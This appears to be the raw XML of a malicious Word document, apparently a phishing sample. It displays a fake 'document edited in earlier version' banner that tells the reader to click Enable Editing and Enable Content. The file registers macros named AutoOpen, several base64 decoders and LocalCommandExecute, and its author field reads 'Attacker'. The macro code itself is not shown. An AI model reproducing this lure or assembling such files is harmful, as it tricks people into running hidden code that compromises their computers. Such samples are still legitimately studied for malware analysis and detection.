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7068C8" w:rsidRPr="00F46D03" w:rsidRDefault="00F46D03" w:rsidP="007068C8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F46D03">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"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5E230A8" wp14:editId="517141E5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-904875</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-904876</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7534275" cy="10715625"/>
                <wp:effectExtent l="0" t="0" r="28575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4275" cy="10715625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-71.25pt;margin-top:-71.25pt;width:593.25pt;height:843.75pt;z-index:-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" fillcolor="#1f497d [3215]" strokecolor="#243f60 [1604]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007068C8" w:rsidRPr="00F46D03">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Document edited in earlier version of Microsoft Word.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007068C8" w:rsidRPr="00F46D03" w:rsidRDefault="007068C8" w:rsidP="007068C8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F46D03">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">To view this content, please click </w:t>
      </w:r>
      <w:r w:rsidRPr="00F46D03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Enable Editing</w:t>
      </w:r>
      <w:r w:rsidRPr="00F46D03">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the </w:t>
      </w:r>
      <w:r w:rsidR="000A327B">
        <w:rPr>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">yellow </w:t>
      </w:r>
      <w:r w:rsidR="000A327B">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>on the top</w:t>
      </w:r>
      <w:r w:rsidRPr="00F46D03">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000A327B">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">bar </w:t>
      </w:r>
      <w:r w:rsidRPr="00F46D03">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">and then click </w:t>
      </w:r>
      <w:r w:rsidRPr="00F46D03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Enable Content</w:t>
      </w:r>
      <w:r w:rsidRPr="00F46D03">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to convert the document version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B53AF9" w:rsidRPr="00F46D03" w:rsidRDefault="002E0ED5" w:rsidP="000964BD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN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1.75pt;height:27.75pt">
            <v:imagedata r:id="rId7" o:title="Capture"/>
          </v:shape>
        </w:pic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F46D03" w:rsidRPr="00F46D03" w:rsidTr="001E61E3">
        <w:trPr>
          <w:trHeight w:val="1576"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="226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28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F46D03">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DB14046" wp14:editId="23FB9B04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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F46D03">
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Microsoft® Word® for Microsoft 365 MSO</w:t>
            </w:r>
            <w:r w:rsidRPr="00F46D03">
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1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:rsidR="007068C8" w:rsidRPr="007068C8" w:rsidRDefault="007068C8" w:rsidP="007068C8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007068C8" w:rsidRPr="007068C8" w:rsidRDefault="007068C8" w:rsidP="007068C8"/>
    <w:sectPr w:rsidR="007068C8" w:rsidRPr="007068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30D0"/>
    <w:rsid w:val="000430D0"/>
    <w:rsid w:val="000964BD"/>
    <w:rsid w:val="000A327B"/>
    <w:rsid w:val="001C2FD9"/>
    <w:rsid w:val="002E0ED5"/>
    <w:rsid w:val="00635E25"/>
    <w:rsid w:val="007068C8"/>
    <w:rsid w:val="00B46D1C"/>
    <w:rsid w:val="00B53AF9"/>
    <w:rsid w:val="00D14DFC"/>
    <w:rsid w:val="00D90AC3"/>
    <w:rsid w:val="00E51965"/>
    <w:rsid w:val="00E75D0C"/>
    <w:rsid w:val="00F46D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RITEANDAPPNEDBASE64STRING" wne:name="Project.NewMacros.WriteAndAppnedBase64String" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.NEWMACROS.DECODEDATA1" wne:name="Project.NewMacros.DecodeDATA1" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.NEWMACROS.DECODEDATA2" wne:name="Project.NewMacros.DecodeDATA2" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.NEWMACROS.DECODEDATA3" wne:name="Project.NewMacros.DecodeDATA3" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.NEWMACROS.LOCALCOMMANDEXECUTE" wne:name="Project.NewMacros.LocalCommand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9C4EF2-696E-4CF1-95FF-D67144757D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Attacker</dc:creator>
  <cp:lastModifiedBy>Attacker</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-02T12:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-02T14:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>